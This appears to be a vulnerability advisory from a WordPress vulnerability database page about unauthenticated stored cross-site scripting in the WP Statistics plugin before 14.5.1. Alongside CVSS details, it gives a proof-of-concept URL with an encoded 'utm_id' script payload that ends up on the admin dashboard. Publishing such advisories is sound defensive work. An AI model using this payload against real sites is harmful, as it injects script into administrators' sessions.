Lucene search

K
wpexploitWpvulndbWPEX-ID:56779EE5-5BF4-47D2-BBAF-B398EA926FBE
HistoryMar 13, 2024 - 12:00 a.m.

WP Statistics < 14.5.1 - Unauthenticated Stored Cross-Site Scripting

2024-03-1300:00:00
wpvulndb
168
vulnerable
cross-site scripting
exploit
wp statistics
unauthenticated.

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

EPSS

0

Percentile

9.0%

Description The plugin does not properly escape visited URLs which are reflected on the plugin’s dashboard.

Visit one same page multiple times so it makes it to the most visited pages, adding the following "utm_id" parameter to it:

http://vulnerable-site.tld/attacked-page/?utm_id=%22%3e%3cimg%2Fsrc=x%20onerror%3Dalert(123)%2F%2F%3e

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

EPSS

0

Percentile

9.0%

Related for WPEX-ID:56779EE5-5BF4-47D2-BBAF-B398EA926FBE